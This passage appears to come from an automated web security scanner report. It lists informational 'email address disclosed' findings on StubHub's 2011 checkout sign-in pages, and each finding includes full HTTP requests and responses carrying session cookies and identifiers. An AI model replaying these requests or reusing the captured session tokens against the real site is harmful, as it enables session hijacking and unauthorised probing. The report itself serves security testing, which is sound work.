STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:52 GMT
Server: Apache
Set-Cookie: TLTHID=E328DE6A39C1103903BC9321C5B4D8D5; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#1990/checkout/checkoutsignin.signin.guestform@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#1990/checkout/checkoutsignin.signin.guestform@srwp01byx005.stubprod.com
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.11. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following email address was disclosed in the response:

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:25 GMT
Server: Apache
Set-Cookie: TLTHID=D34B2BA639C11039039AC88CFE43A8B9; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1986/checkout/checkoutsignin.signin.guestform@srwp01byx002.stubprod.com
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


8.12. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following email address was disclosed in the response:

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:24 GMT
Server: Apache
Set-Cookie: TLTHID=D278406039C110390352E52D5035BF67; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1801#1985/checkout/checkoutsignin.signin.guestform@srwp01byx001.stubprod.com
com-stubhub-dye: 1801#1985/checkout/checkoutsignin.signin.guestform@srwp01byx001.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


8.13. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following email address was disclosed in the response:

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:48 GMT
Server: Apache
Set-Cookie: TLTHID=E0A6F98839C1103900CED2E92387FB7D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#17d/checkout/checkoutsignin.signin.guestform@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#17d/checkout/checkoutsignin.signin.guestform@srwp01byx009.stubprod.com
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


8.14. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.signinform

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/checkoutsignin.signin.signinform HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 